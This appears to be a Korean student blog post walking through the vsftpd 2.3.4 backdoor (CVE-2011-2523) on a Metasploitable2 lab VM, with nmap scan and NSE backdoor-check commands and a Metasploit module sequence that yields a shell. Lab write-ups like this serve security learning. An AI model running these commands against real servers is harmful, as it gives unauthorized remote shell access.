Vsftpd 2.3.4 - Backdoor
vsftpd 2.3.4는 2011년에 발견된 취약점입니다 해커는 FTP 클라이언트가 서버와의 연결을 설정할 때 취약한 서버에서 원하지 않는 명령을 실행하게 만들 수 있는 취약점 입니다
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploitable - Browse /Metasploitable2 at SourceForge.net
Runn is a modern resource and capacity planning platform that gets remote teams on the same page. Runn is best suited for project managers, operations leads, resourcing managers and other people responsible for project delivery.
sourceforge.net
Metasploitable2 에서 진행했습니다
CVE-2011-2523 실습
nmap -A -sV -P -T4 192.168.153.131
vsftpd 2.3.4 서버를 이용하고 있는걸 확인했습니다
더 자세한 정보를 얻기 위해
nmap nmap --script ftp-vsftpd-backdoor -p 21 [IP]
이 명령어는 해당 vsftpd 백도어 취약점에 유무를 확인할수 있다
해당 서버가 백도어 취약점에 노출이 됬다는걸 알아냈습니다
Metasploit
search vsftpd 2.3.4
use 0
show options
set RHOSTS [IP]
exploit
성공적으로 쉘을 얻어냈다
그후
마치며
앞으로도 이 방학기간 동안 cve 취약점도 꾸준히 올릴거같습니다
여기까지 봐주셔서 감사합니다
'취약점 | CVE' 카테고리의 다른 글
| [CVE-2017-0143] MS17-010 - Windows 7 취약점 (0) | 2025.01.15 |
|---|---|
| [CVE-2024-1017] [POC] Wordpress SQL 인젝션 취약점 (0) | 2024.10.01 |